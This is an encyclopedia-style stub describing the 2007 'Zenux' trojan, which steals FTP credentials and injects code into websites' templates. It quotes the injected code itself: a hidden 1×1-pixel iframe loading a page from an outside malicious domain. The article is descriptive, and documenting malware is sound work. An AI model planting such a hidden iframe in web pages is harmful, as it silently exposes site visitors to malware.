This article has multiple issues. Please help improve it or discuss these issues on the talk page. (Learn how and when to remove these template messages)(Learn how and when to remove this template message)
The virus functioned as follows: after infecting the user's PC, the Trojan steals all FTP access codes on the computer. After this it accesses the respective FTP accounts, and inserts a small piece of code into the template of the sites, located on the FTP account. After the page has been infected, it acts as a host for the virus, while the latter becomes a small square 1×1 pixels in the lower left corner of the page.
The code inserted by the virus is the following:
<!-- ~ --><iframe src="http://zenux.info/info/index.php" width="1" height="1"><!-- ~ -->
First reports about the virus came on June 11, 2007.
- TROJAN ALERT! "Zenux" Steals FTP Access Codes, InfoNIAC.com, June 11, 2007.
|This malware-related article is a stub. You can help Wikipedia by expanding it.|